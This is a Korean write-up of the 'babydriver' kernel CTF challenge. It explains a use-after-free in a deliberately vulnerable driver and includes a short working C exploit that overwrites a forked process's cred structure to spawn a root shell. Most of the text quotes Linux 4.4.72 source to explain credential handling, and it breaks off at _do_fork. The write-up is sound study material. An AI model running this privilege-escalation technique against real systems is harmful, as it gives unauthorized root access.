문제 풀기
문제 분석
문제 파일: download
다운받은 tar파일 풀면 boot.sh, bzImage, rootfs.cpio 가 있다.
rootfs.cpio이 파일시스템으로 분석해야될 파일을 가지고 있다. 이를 얻기 위해서 아래 명령어들을 쳤다.
mkdir core
cp rootfs.cpio ./core/rootfs.cpio.gz
gunzip ./rootfs.cpio.gz
cpio -idmv < rootfs.cpio
그리고 init을 읽어서 커널 모듈이 어디에 있는지 확인한다.
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh
umount /proc
umount /sys
poweroff -d 0 -f
/lib/modules/4.4.72/babydriver.ko 에 있어서 디컴파일러에 넣었다.
함수가 7개 있다. 각 함수가 하는 일은 다음과 같다.
- init: 생성할 때 쓰인다.
insmod할 때 불린다. 이 문제에서는 중요하지 않음 - exit: 종료할 때 쓰인다.
rmmod할 때 불린다. 이 문제에서는 중요하지 않음 - open:
open할 때 불린다.dev_stuct에kmalloc으로 버퍼를 할당한다. - release:
close할 때 불린다.dev_stuct에 있는 버퍼를kfree로 해제한다. - read:
read할 때 불린다.dev_struct에 데이터를 복사해 저장한다. - write:
write할 때 불린다.dev_strcut에 kernel이 user에게 데이터를 준다. - ioctl:
ioctl할 떄 불린다. command가 0x10001이라면dev_struct을kfree하고 다시kmalloc으로 받은 인자 만큼을 할당한다.
할당한 주소를 전역변수에서 사용하고 free하고 초기화를 안해서 문제가 생긴다.
Exploit
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/stat.h>
int main() {
// 포인터 2개 만들기
int fd1 = open("/dev/babydev", 2); // 읽기 쓰기 모드
int fd2 = open("/dev/babydev", 2); // 읽기 쓰기 모드
// fork했을 때 생기는 creds 구조체의 크기인 0xa8만큼 alloc
ioctl(fd1, 0x10001, 0xa8);
close(fd1);
int pid = fork(); // 여기서 creds 구조체가 babydev에 있는 주소를 할당 받음
if (pid < 0) { // fork error
puts("fork error");
exit(0);
}
else if (pid == 0) { // child일 경우
char zeros[30] = {0};
write(fd2, zeros, 28);
if (getuid() == 0) { // root인 경우
system("/bin/sh"); // root shell 실행
exit(0);
}
}
else { // parent인 경우
wait(NULL);
}
close(fd2);
return 0;
}
- fd변수를 2개 만들어서 하나를 release해도 다른 것으로 조작할 수 있도록 한다.
ioctl로 0xa8 크기의 청크를 할당한다. ->dev_struct에 0xa8 크기 청크 존재close를 통해서 0xa8 크기의 청크를 해제한다. -> 하지만dev_struct에는 아직도 해제한 청크의 주소가 남아있다. 이를 통해 나중에 접근할 수 있다.fork를 통해서 0xa8크기의 청크를 creds가 쓰게 한다. ->fork된 프로세스의 권한 정보를 담고 있는 creds에 대한 포인터가dev_struct애 존재하게 된다.write을 통해 creds(dev_struct)에 0을 덮어서fork된 프로세스의 권한을 상승시킨다.- root 쉘을 실행시킨다.
Exploit 설명
fork를 코드를 보자. kernel 들어가서 uname -a를 통해서 커널의 버전을 알아낸다. -> 4.4.72
system이나 execve함수는 새 프로세스를 생성할때 creds를 참고해서 권한을 설정한다. -> creds를 덮고 system함수 같은 거 부르면 덮은 권한대로 새 프로세스가 실행된다.
증명
증명해야될 것
- system함수가 creds를 가지고 어떻게 프로세스를 만드는지 <- 익스플로잇에서는 현재 프로세스의 creds값을 덮을 것이기에 현재 프로세스의 creds를 참고하는 것을 증명하기
- system함수가 프로세스를 만들기 전 fork에서 creds가 어떻게 준비되는지 <- 포인터를 가지고 있는 0xa8의 청크를 free할 것이기에 creds가 0xa8인지 증명하기
system함수가 creds를 가지고 어떻게 프로세스를 만드는지
libc 에서 system함수는 내부적으로 execve 시스템 콜을 부른다. 커널에서 보자
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L1732
SYSCALL_DEFINE3(execve,
const char __user *, filename,
const char __user *const __user *, argv,
const char __user *const __user *, envp)
{
return do_execve(getname(filename), argv, envp);
}
do_execve를 부른다.
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L1650
int do_execve(struct filename *filename,
const char __user *const __user *__argv,
const char __user *const __user *__envp)
{
struct user_arg_ptr argv = { .ptr.native = __argv };
struct user_arg_ptr envp = { .ptr.native = __envp };
return do_execveat_common(AT_FDCWD, filename, argv, envp, 0);
}
do_execveat_common을 부른다.
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L1504
static int do_execveat_common(int fd, struct filename *filename,
struct user_arg_ptr argv,
struct user_arg_ptr envp,
int flags)
{
char *pathbuf = NULL;
struct linux_binprm *bprm;
struct file *file;
struct files_struct *displaced;
int retval;
if (IS_ERR(filename))
return PTR_ERR(filename);
/*
* We move the actual failure in case of RLIMIT_NPROC excess from
* set*uid() to execve() because too many poorly written programs
* don't check setuid() return code. Here we additionally recheck
* whether NPROC limit is still exceeded.
*/
if ((current->flags & PF_NPROC_EXCEEDED) &&
atomic_read(¤t_user()->processes) > rlimit(RLIMIT_NPROC)) {
retval = -EAGAIN;
goto out_ret;
}
/* We're below the limit (still or again), so we don't want to make
* further execve() calls fail. */
current->flags &= ~PF_NPROC_EXCEEDED;
retval = unshare_files(&displaced);
if (retval)
goto out_ret;
retval = -ENOMEM;
bprm = kzalloc(sizeof(*bprm), GFP_KERNEL);
if (!bprm)
goto out_files;
retval = prepare_bprm_creds(bprm);
if (retval)
goto out_free;
check_unsafe_exec(bprm);
current->in_execve = 1;
file = do_open_execat(fd, filename, flags);
retval = PTR_ERR(file);
if (IS_ERR(file))
goto out_unmark;
sched_exec();
bprm->file = file;
if (fd == AT_FDCWD || filename->name[0] == '/') {
bprm->filename = filename->name;
} else {
if (filename->name[0] == '\0')
pathbuf = kasprintf(GFP_TEMPORARY, "/dev/fd/%d", fd);
else
pathbuf = kasprintf(GFP_TEMPORARY, "/dev/fd/%d/%s",
fd, filename->name);
if (!pathbuf) {
retval = -ENOMEM;
goto out_unmark;
}
/*
* Record that a name derived from an O_CLOEXEC fd will be
* inaccessible after exec. Relies on having exclusive access to
* current->files (due to unshare_files above).
*/
if (close_on_exec(fd, rcu_dereference_raw(current->files->fdt)))
bprm->interp_flags |= BINPRM_FLAGS_PATH_INACCESSIBLE;
bprm->filename = pathbuf;
}
bprm->interp = bprm->filename;
retval = bprm_mm_init(bprm);
if (retval)
goto out_unmark;
bprm->argc = count(argv, MAX_ARG_STRINGS);
if ((retval = bprm->argc) < 0)
goto out;
bprm->envc = count(envp, MAX_ARG_STRINGS);
if ((retval = bprm->envc) < 0)
goto out;
retval = prepare_binprm(bprm);
if (retval < 0)
goto out;
retval = copy_strings_kernel(1, &bprm->filename, bprm);
if (retval < 0)
goto out;
bprm->exec = bprm->p;
retval = copy_strings(bprm->envc, envp, bprm);
if (retval < 0)
goto out;
retval = copy_strings(bprm->argc, argv, bprm);
if (retval < 0)
goto out;
would_dump(bprm, bprm->file);
retval = exec_binprm(bprm);
if (retval < 0)
goto out;
/* execve succeeded */
current->fs->in_exec = 0;
current->in_execve = 0;
acct_update_integrals(current);
task_numa_free(current);
free_bprm(bprm);
kfree(pathbuf);
putname(filename);
if (displaced)
put_files_struct(displaced);
return retval;
out:
if (bprm->mm) {
acct_arg_size(bprm, 0);
mmput(bprm->mm);
}
out_unmark:
current->fs->in_exec = 0;
current->in_execve = 0;
out_free:
free_bprm(bprm);
kfree(pathbuf);
out_files:
if (displaced)
reset_files_struct(displaced);
out_ret:
putname(filename);
return retval;
}
prepare_bprm_creds(bprm)에서 bprm의 creds를 업데이트한다. <- 요건 나중에 살펴보자.
일단 bprm을 어떻게 프로세스로 만드는지를 먼저 살펴보자.
exec_binprm을 부른다.
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L1479
static int exec_binprm(struct linux_binprm *bprm)
{
pid_t old_pid, old_vpid;
int ret;
/* Need to fetch pid before load_binary changes it */
old_pid = current->pid;
rcu_read_lock();
old_vpid = task_pid_nr_ns(current, task_active_pid_ns(current->parent));
rcu_read_unlock();
ret = search_binary_handler(bprm);
if (ret >= 0) {
audit_bprm(bprm);
trace_sched_process_exec(current, old_pid, bprm);
ptrace_event(PTRACE_EVENT_EXEC, old_vpid);
proc_exec_connector(current);
}
return ret;
}
search_binary_handler을 부른다.
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L1426
int search_binary_handler(struct linux_binprm *bprm)
{
bool need_retry = IS_ENABLED(CONFIG_MODULES);
struct linux_binfmt *fmt;
int retval;
/* This allows 4 levels of binfmt rewrites before failing hard. */
if (bprm->recursion_depth > 5)
return -ELOOP;
retval = security_bprm_check(bprm);
if (retval)
return retval;
retval = -ENOENT;
retry:
read_lock(&binfmt_lock);
list_for_each_entry(fmt, &formats, lh) { // formats라는 전역변수에 하나씩 가져와 fmt에 넣는다.
if (!try_module_get(fmt->module))
continue;
read_unlock(&binfmt_lock);
bprm->recursion_depth++;
retval = fmt->load_binary(bprm); // 여기서 formats에 있던 fmt의 멤버 load_binary가 실행된다.
read_lock(&binfmt_lock);
put_binfmt(fmt);
bprm->recursion_depth--;
if (retval < 0 && !bprm->mm) {
/* we got to flush_old_exec() and failed after it */
read_unlock(&binfmt_lock);
force_sigsegv(SIGSEGV, current);
return retval;
}
if (retval != -ENOEXEC || !bprm->file) {
read_unlock(&binfmt_lock);
return retval;
}
}
read_unlock(&binfmt_lock);
if (need_retry) {
if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
printable(bprm->buf[2]) && printable(bprm->buf[3]))
return retval;
if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
return retval;
need_retry = false;
goto retry;
}
return retval;
}
EXPORT_SYMBOL(search_binary_handler);
fmt->load_binary을 부른다. fmt는 formats라는 전역변수에서 가져온다. formats가 어떻게 세팅되는 지 보자.
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L72
void __register_binfmt(struct linux_binfmt * fmt, int insert)
{
BUG_ON(!fmt);
if (WARN_ON(!fmt->load_binary))
return;
write_lock(&binfmt_lock);
insert ? list_add(&fmt->lh, &formats) :
list_add_tail(&fmt->lh, &formats);
write_unlock(&binfmt_lock);
}
여기서 세팅된다. __register_binfmt는 언제 불리는지 보자.
// /include/linux/binfmts.h
// https://elixir.bootlin.com/linux/v4.4.72/source/include/linux/binfmts.h#L88
static inline void register_binfmt(struct linux_binfmt *fmt)
{
__register_binfmt(fmt, 0);
}
register_binfmt는 어디서 불릴까?
// /fs/binfmt_elf.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/binfmt_elf.c#L2324
static int __init init_elf_binfmt(void)
{
register_binfmt(&elf_format);
return 0;
}
여기서 불리는데 이건 모듈이 로드될 때 불린다. 이런 주요 바이너리 포맷 로더 모듈들은 보통 커널 빌드될 때 알아서 같이 들어간다. -> 커널 부팅 과정 중에서 register_binfmt가 실행되고 formats에 elf_format이 들어간다.
// /fs/binfmt_elf.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/binfmt_elf.c#L84
static struct linux_binfmt elf_format = {
.module = THIS_MODULE,
.load_binary = load_elf_binary,
.load_shlib = load_elf_library,
.core_dump = elf_core_dump,
.min_coredump = ELF_EXEC_PAGESIZE,
};
elf_format은 위와 같이 생겼다.
결과적으로 search_binary_handler 함수에서 fmt->load_binary(bprm);은 load_elf_binary를 부른다는 것을 알 수 있다.
load_elf_binary를 보자
// /fs/binfmt_elf.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/binfmt_elf.c#L665
static int load_elf_binary(struct linux_binprm *bprm)
{
struct file *interpreter = NULL; /* to shut gcc up */
unsigned long load_addr = 0, load_bias = 0;
int load_addr_set = 0;
char * elf_interpreter = NULL;
unsigned long error;
struct elf_phdr *elf_ppnt, *elf_phdata, *interp_elf_phdata = NULL;
unsigned long elf_bss, elf_brk;
int retval, i;
unsigned long elf_entry;
unsigned long interp_load_addr = 0;
unsigned long start_code, end_code, start_data, end_data;
unsigned long reloc_func_desc __maybe_unused = 0;
int executable_stack = EXSTACK_DEFAULT;
struct pt_regs *regs = current_pt_regs();
struct {
struct elfhdr elf_ex;
struct elfhdr interp_elf_ex;
} *loc;
struct arch_elf_state arch_state = INIT_ARCH_ELF_STATE;
loc = kmalloc(sizeof(*loc), GFP_KERNEL);
if (!loc) {
retval = -ENOMEM;
goto out_ret;
}
/* Get the exec-header */
loc->elf_ex = *((struct elfhdr *)bprm->buf);
retval = -ENOEXEC;
/* First of all, some simple consistency checks */
if (memcmp(loc->elf_ex.e_ident, ELFMAG, SELFMAG) != 0)
goto out;
if (loc->elf_ex.e_type != ET_EXEC && loc->elf_ex.e_type != ET_DYN)
goto out;
if (!elf_check_arch(&loc->elf_ex))
goto out;
if (!bprm->file->f_op->mmap)
goto out;
elf_phdata = load_elf_phdrs(&loc->elf_ex, bprm->file);
if (!elf_phdata)
goto out;
elf_ppnt = elf_phdata;
elf_bss = 0;
elf_brk = 0;
start_code = ~0UL;
end_code = 0;
start_data = 0;
end_data = 0;
for (i = 0; i < loc->elf_ex.e_phnum; i++) {
if (elf_ppnt->p_type == PT_INTERP) {
/* This is the program interpreter used for
* shared libraries - for now assume that this
* is an a.out format binary
*/
retval = -ENOEXEC;
if (elf_ppnt->p_filesz > PATH_MAX ||
elf_ppnt->p_filesz < 2)
goto out_free_ph;
retval = -ENOMEM;
elf_interpreter = kmalloc(elf_ppnt->p_filesz,
GFP_KERNEL);
if (!elf_interpreter)
goto out_free_ph;
retval = kernel_read(bprm->file, elf_ppnt->p_offset,
elf_interpreter,
elf_ppnt->p_filesz);
if (retval != elf_ppnt->p_filesz) {
if (retval >= 0)
retval = -EIO;
goto out_free_interp;
}
/* make sure path is NULL terminated */
retval = -ENOEXEC;
if (elf_interpreter[elf_ppnt->p_filesz - 1] != '\0')
goto out_free_interp;
interpreter = open_exec(elf_interpreter);
retval = PTR_ERR(interpreter);
if (IS_ERR(interpreter))
goto out_free_interp;
/*
* If the binary is not readable then enforce
* mm->dumpable = 0 regardless of the interpreter's
* permissions.
*/
would_dump(bprm, interpreter);
/* Get the exec headers */
retval = kernel_read(interpreter, 0,
(void *)&loc->interp_elf_ex,
sizeof(loc->interp_elf_ex));
if (retval != sizeof(loc->interp_elf_ex)) {
if (retval >= 0)
retval = -EIO;
goto out_free_dentry;
}
break;
}
elf_ppnt++;
}
elf_ppnt = elf_phdata;
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
switch (elf_ppnt->p_type) {
case PT_GNU_STACK:
if (elf_ppnt->p_flags & PF_X)
executable_stack = EXSTACK_ENABLE_X;
else
executable_stack = EXSTACK_DISABLE_X;
break;
case PT_LOPROC ... PT_HIPROC:
retval = arch_elf_pt_proc(&loc->elf_ex, elf_ppnt,
bprm->file, false,
&arch_state);
if (retval)
goto out_free_dentry;
break;
}
/* Some simple consistency checks for the interpreter */
if (elf_interpreter) {
retval = -ELIBBAD;
/* Not an ELF interpreter */
if (memcmp(loc->interp_elf_ex.e_ident, ELFMAG, SELFMAG) != 0)
goto out_free_dentry;
/* Verify the interpreter has a valid arch */
if (!elf_check_arch(&loc->interp_elf_ex))
goto out_free_dentry;
/* Load the interpreter program headers */
interp_elf_phdata = load_elf_phdrs(&loc->interp_elf_ex,
interpreter);
if (!interp_elf_phdata)
goto out_free_dentry;
/* Pass PT_LOPROC..PT_HIPROC headers to arch code */
elf_ppnt = interp_elf_phdata;
for (i = 0; i < loc->interp_elf_ex.e_phnum; i++, elf_ppnt++)
switch (elf_ppnt->p_type) {
case PT_LOPROC ... PT_HIPROC:
retval = arch_elf_pt_proc(&loc->interp_elf_ex,
elf_ppnt, interpreter,
true, &arch_state);
if (retval)
goto out_free_dentry;
break;
}
}
/*
* Allow arch code to reject the ELF at this point, whilst it's
* still possible to return an error to the code that invoked
* the exec syscall.
*/
retval = arch_check_elf(&loc->elf_ex, !!interpreter, &arch_state);
if (retval)
goto out_free_dentry;
/* Flush all traces of the currently running executable */
retval = flush_old_exec(bprm);
if (retval)
goto out_free_dentry;
/* Do this immediately, since STACK_TOP as used in setup_arg_pages
may depend on the personality. */
SET_PERSONALITY2(loc->elf_ex, &arch_state);
if (elf_read_implies_exec(loc->elf_ex, executable_stack))
current->personality |= READ_IMPLIES_EXEC;
if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
current->flags |= PF_RANDOMIZE;
setup_new_exec(bprm);
/* Do this so that we can load the interpreter, if need be. We will
change some of these later */
retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
executable_stack);
if (retval < 0)
goto out_free_dentry;
current->mm->start_stack = bprm->p;
/* Now we do a little grungy work by mmapping the ELF image into
the correct location in memory. */
for(i = 0, elf_ppnt = elf_phdata;
i < loc->elf_ex.e_phnum; i++, elf_ppnt++) {
int elf_prot = 0, elf_flags;
unsigned long k, vaddr;
unsigned long total_size = 0;
if (elf_ppnt->p_type != PT_LOAD)
continue;
if (unlikely (elf_brk > elf_bss)) {
unsigned long nbyte;
/* There was a PT_LOAD segment with p_memsz > p_filesz
before this one. Map anonymous pages, if needed,
and clear the area. */
retval = set_brk(elf_bss + load_bias,
elf_brk + load_bias);
if (retval)
goto out_free_dentry;
nbyte = ELF_PAGEOFFSET(elf_bss);
if (nbyte) {
nbyte = ELF_MIN_ALIGN - nbyte;
if (nbyte > elf_brk - elf_bss)
nbyte = elf_brk - elf_bss;
if (clear_user((void __user *)elf_bss +
load_bias, nbyte)) {
/*
* This bss-zeroing can fail if the ELF
* file specifies odd protections. So
* we don't check the return value
*/
}
}
}
if (elf_ppnt->p_flags & PF_R)
elf_prot |= PROT_READ;
if (elf_ppnt->p_flags & PF_W)
elf_prot |= PROT_WRITE;
if (elf_ppnt->p_flags & PF_X)
elf_prot |= PROT_EXEC;
elf_flags = MAP_PRIVATE | MAP_DENYWRITE | MAP_EXECUTABLE;
vaddr = elf_ppnt->p_vaddr;
if (loc->elf_ex.e_type == ET_EXEC || load_addr_set) {
elf_flags |= MAP_FIXED;
} else if (loc->elf_ex.e_type == ET_DYN) {
/* Try and get dynamic programs out of the way of the
* default mmap base, as well as whatever program they
* might try to exec. This is because the brk will
* follow the loader, and is not movable. */
load_bias = ELF_ET_DYN_BASE - vaddr;
if (current->flags & PF_RANDOMIZE)
load_bias += arch_mmap_rnd();
load_bias = ELF_PAGESTART(load_bias);
total_size = total_mapping_size(elf_phdata,
loc->elf_ex.e_phnum);
if (!total_size) {
retval = -EINVAL;
goto out_free_dentry;
}
}
error = elf_map(bprm->file, load_bias + vaddr, elf_ppnt,
elf_prot, elf_flags, total_size);
if (BAD_ADDR(error)) {
retval = IS_ERR((void *)error) ?
PTR_ERR((void*)error) : -EINVAL;
goto out_free_dentry;
}
if (!load_addr_set) {
load_addr_set = 1;
load_addr = (elf_ppnt->p_vaddr - elf_ppnt->p_offset);
if (loc->elf_ex.e_type == ET_DYN) {
load_bias += error -
ELF_PAGESTART(load_bias + vaddr);
load_addr += load_bias;
reloc_func_desc = load_bias;
}
}
k = elf_ppnt->p_vaddr;
if (k < start_code)
start_code = k;
if (start_data < k)
start_data = k;
/*
* Check to see if the section's size will overflow the
* allowed task size. Note that p_filesz must always be
* <= p_memsz so it is only necessary to check p_memsz.
*/
if (BAD_ADDR(k) || elf_ppnt->p_filesz > elf_ppnt->p_memsz ||
elf_ppnt->p_memsz > TASK_SIZE ||
TASK_SIZE - elf_ppnt->p_memsz < k) {
/* set_brk can never work. Avoid overflows. */
retval = -EINVAL;
goto out_free_dentry;
}
k = elf_ppnt->p_vaddr + elf_ppnt->p_filesz;
if (k > elf_bss)
elf_bss = k;
if ((elf_ppnt->p_flags & PF_X) && end_code < k)
end_code = k;
if (end_data < k)
end_data = k;
k = elf_ppnt->p_vaddr + elf_ppnt->p_memsz;
if (k > elf_brk)
elf_brk = k;
}
loc->elf_ex.e_entry += load_bias;
elf_bss += load_bias;
elf_brk += load_bias;
start_code += load_bias;
end_code += load_bias;
start_data += load_bias;
end_data += load_bias;
/* Calling set_brk effectively mmaps the pages that we need
* for the bss and break sections. We must do this before
* mapping in the interpreter, to make sure it doesn't wind
* up getting placed where the bss needs to go.
*/
retval = set_brk(elf_bss, elf_brk);
if (retval)
goto out_free_dentry;
if (likely(elf_bss != elf_brk) && unlikely(padzero(elf_bss))) {
retval = -EFAULT; /* Nobody gets to see this, but.. */
goto out_free_dentry;
}
if (elf_interpreter) {
unsigned long interp_map_addr = 0;
elf_entry = load_elf_interp(&loc->interp_elf_ex,
interpreter,
&interp_map_addr,
load_bias, interp_elf_phdata);
if (!IS_ERR((void *)elf_entry)) {
/*
* load_elf_interp() returns relocation
* adjustment
*/
interp_load_addr = elf_entry;
elf_entry += loc->interp_elf_ex.e_entry;
}
if (BAD_ADDR(elf_entry)) {
retval = IS_ERR((void *)elf_entry) ?
(int)elf_entry : -EINVAL;
goto out_free_dentry;
}
reloc_func_desc = interp_load_addr;
allow_write_access(interpreter);
fput(interpreter);
kfree(elf_interpreter);
} else {
elf_entry = loc->elf_ex.e_entry;
if (BAD_ADDR(elf_entry)) {
retval = -EINVAL;
goto out_free_dentry;
}
}
kfree(interp_elf_phdata);
kfree(elf_phdata);
set_binfmt(&elf_format);
#ifdef ARCH_HAS_SETUP_ADDITIONAL_PAGES
retval = arch_setup_additional_pages(bprm, !!elf_interpreter);
if (retval < 0)
goto out;
#endif /* ARCH_HAS_SETUP_ADDITIONAL_PAGES */
install_exec_creds(bprm);
retval = create_elf_tables(bprm, &loc->elf_ex,
load_addr, interp_load_addr);
if (retval < 0)
goto out;
/* N.B. passed_fileno might not be initialized? */
current->mm->end_code = end_code;
current->mm->start_code = start_code;
current->mm->start_data = start_data;
current->mm->end_data = end_data;
current->mm->start_stack = bprm->p;
if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {
current->mm->brk = current->mm->start_brk =
arch_randomize_brk(current->mm);
#ifdef compat_brk_randomized
current->brk_randomized = 1;
#endif
}
if (current->personality & MMAP_PAGE_ZERO) {
/* Why this, you ask??? Well SVr4 maps page 0 as read-only,
and some applications "depend" upon this behavior.
Since we do not have the power to recompile these, we
emulate the SVr4 behavior. Sigh. */
error = vm_mmap(NULL, 0, PAGE_SIZE, PROT_READ | PROT_EXEC,
MAP_FIXED | MAP_PRIVATE, 0);
}
#ifdef ELF_PLAT_INIT
/*
* The ABI may specify that certain registers be set up in special
* ways (on i386 %edx is the address of a DT_FINI function, for
* example. In addition, it may also specify (eg, PowerPC64 ELF)
* that the e_entry field is the address of the function descriptor
* for the startup routine, rather than the address of the startup
* routine itself. This macro performs whatever initialization to
* the regs structure is required as well as any relocations to the
* function descriptor entries when executing dynamically links apps.
*/
ELF_PLAT_INIT(regs, reloc_func_desc);
#endif
start_thread(regs, elf_entry, bprm->p);
retval = 0;
out:
kfree(loc);
out_ret:
return retval;
/* error cleanup */
out_free_dentry:
kfree(interp_elf_phdata);
allow_write_access(interpreter);
if (interpreter)
fput(interpreter);
out_free_interp:
kfree(elf_interpreter);
out_free_ph:
kfree(elf_phdata);
goto out;
}
좀 길긴하다.
중요한 부분은 install_exec_creds(bprm);와 start_thread(regs, elf_entry, bprm->p); 이다.
install_exec_creds(bprm);에서 creds를 bprm에 세팅하고 이 권한 정보를 가지고 start_thread(regs, elf_entry, bprm->p);에서 실제로 실행한다.
install_exec_creds(bprm)을 보자
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L1241
void install_exec_creds(struct linux_binprm *bprm)
{
security_bprm_committing_creds(bprm);
commit_creds(bprm->cred);
bprm->cred = NULL;
/*
* Disable monitoring for regular users
* when executing setuid binaries. Must
* wait until new credentials are committed
* by commit_creds() above
*/
if (get_dumpable(current->mm) != SUID_DUMP_USER)
perf_event_exit_task(current);
/*
* cred_guard_mutex must be held at least to this point to prevent
* ptrace_attach() from altering our determination of the task's
* credentials; any time after this it may be unlocked.
*/
security_bprm_committed_creds(bprm);
mutex_unlock(¤t->signal->cred_guard_mutex);
}
EXPORT_SYMBOL(install_exec_creds);
commit_creds을 보자.
// /kernel/cred.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/cred.c#L422
int commit_creds(struct cred *new)
{
struct task_struct *task = current; // 현재 프로세스
const struct cred *old = task->real_cred;
kdebug("commit_creds(%p{%d,%d})", new,
atomic_read(&new->usage),
read_cred_subscribers(new));
BUG_ON(task->cred != old);
#ifdef CONFIG_DEBUG_CREDENTIALS
BUG_ON(read_cred_subscribers(old) < 2);
validate_creds(old);
validate_creds(new);
#endif
BUG_ON(atomic_read(&new->usage) < 1);
get_cred(new); /* we will require a ref for the subj creds too */
/* dumpability changes */
if (!uid_eq(old->euid, new->euid) ||
!gid_eq(old->egid, new->egid) ||
!uid_eq(old->fsuid, new->fsuid) ||
!gid_eq(old->fsgid, new->fsgid) ||
!cred_cap_issubset(old, new)) {
if (task->mm)
set_dumpable(task->mm, suid_dumpable);
task->pdeath_signal = 0;
smp_wmb();
}
/* alter the thread keyring */
if (!uid_eq(new->fsuid, old->fsuid))
key_fsuid_changed(task);
if (!gid_eq(new->fsgid, old->fsgid))
key_fsgid_changed(task);
/* do it
* RLIMIT_NPROC limits on user->processes have already been checked
* in set_user().
*/
alter_cred_subscribers(new, 2);
if (new->user != old->user)
atomic_inc(&new->user->processes);
rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);
if (new->user != old->user)
atomic_dec(&old->user->processes);
alter_cred_subscribers(old, -2);
/* send notifications */
if (!uid_eq(new->uid, old->uid) ||
!uid_eq(new->euid, old->euid) ||
!uid_eq(new->suid, old->suid) ||
!uid_eq(new->fsuid, old->fsuid))
proc_id_connector(task, PROC_EVENT_UID);
if (!gid_eq(new->gid, old->gid) ||
!gid_eq(new->egid, old->egid) ||
!gid_eq(new->sgid, old->sgid) ||
!gid_eq(new->fsgid, old->fsgid))
proc_id_connector(task, PROC_EVENT_GID);
/* release the old obj and subj refs both */
put_cred(old);
put_cred(old);
return 0;
}
EXPORT_SYMBOL(commit_creds);
new는 새로 실행할 프로세스의 creds이다.
task는 현재 실행하고 있는 프로세스의 creds로 익스에 성공한다면 0으로 덮여있을 것이다.
rcu_assign_pointer(task->real_cred, new);와 rcu_assign_pointer(task->cred, new); 부분에서 현재 프로세스의 creds를 new로 교체한다.
자 과정을 통해서 prepare_bprm_creds(bprm)으로 세팅한 bprm이 어떻게 새로운 프로세스에 적용되는 지를 알 수 있다. <- bprm->creds로 현재 프로세스의 creds를 덮는 다는 것이다.
BUG_ON(task->cred != old);부분에서 터지지 않나? 라는 생각이 들었는데 찾아보니 task->cred랑 task->real_cred는 특수한 상황이 아니라면 같은 객체를 가리키고 있다고 한다. 그래서 여기서 터지지 않는다.
자 그럼 prepare_bprm_creds(bprm)이 어떻게 세팅되는지를 보자.
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/fs/exec.c#L1196
int prepare_bprm_creds(struct linux_binprm *bprm)
{
if (mutex_lock_interruptible(¤t->signal->cred_guard_mutex))
return -ERESTARTNOINTR;
bprm->cred = prepare_exec_creds();
if (likely(bprm->cred))
return 0;
mutex_unlock(¤t->signal->cred_guard_mutex);
return -ENOMEM;
}
prepare_exec_creds을 부른다.
// /fs/exec.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/cred.c#L292
struct cred *prepare_exec_creds(void)
{
struct cred *new;
new = prepare_creds();
if (!new)
return new;
#ifdef CONFIG_KEYS
/* newly exec'd tasks don't get a thread keyring */
key_put(new->thread_keyring);
new->thread_keyring = NULL;
/* inherit the session keyring; new process keyring */
key_put(new->process_keyring);
new->process_keyring = NULL;
#endif
return new;
}
prepare_creds을 부른다.
// /kernel/cred.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/cred.c#L229
struct cred *prepare_creds(void)
{
struct task_struct *task = current;
const struct cred *old;
struct cred *new;
validate_process_creds();
new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;
kdebug("prepare_creds() alloc %p", new);
old = task->cred;
memcpy(new, old, sizeof(struct cred));
atomic_set(&new->usage, 1);
set_cred_subscribers(new, 0);
get_group_info(new->group_info);
get_uid(new->user);
get_user_ns(new->user_ns);
#ifdef CONFIG_KEYS
key_get(new->session_keyring);
key_get(new->process_keyring);
key_get(new->thread_keyring);
key_get(new->request_key_auth);
#endif
#ifdef CONFIG_SECURITY
new->security = NULL;
#endif
if (security_prepare_creds(new, old, GFP_KERNEL) < 0)
goto error;
validate_creds(new);
return new;
error:
abort_creds(new);
return NULL;
}
EXPORT_SYMBOL(prepare_creds);
current->creds를 memcpy를 통해서 new로 복사하는 것을 알 수 있다.
위의 커널 코드를 분석을 하고 나서 알 수 있는 점은 현재 프로세스의 creds를 참고해서 새로운 프로세스의 creds를 생성한다는 것이다.
system함수가 프로세스를 만들기 전 fork에서 creds가 어떻게 준비되는지
// /kernel/fork.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/fork.c#L1819
#ifdef __ARCH_WANT_SYS_FORK
SYSCALL_DEFINE0(fork)
{
#ifdef CONFIG_MMU
return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
#else
/* can not support in nommu mode */
return -EINVAL;
#endif
}
#endif
_do_fork를 부른다.
// /kernel/fork.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/fork.c#L1724
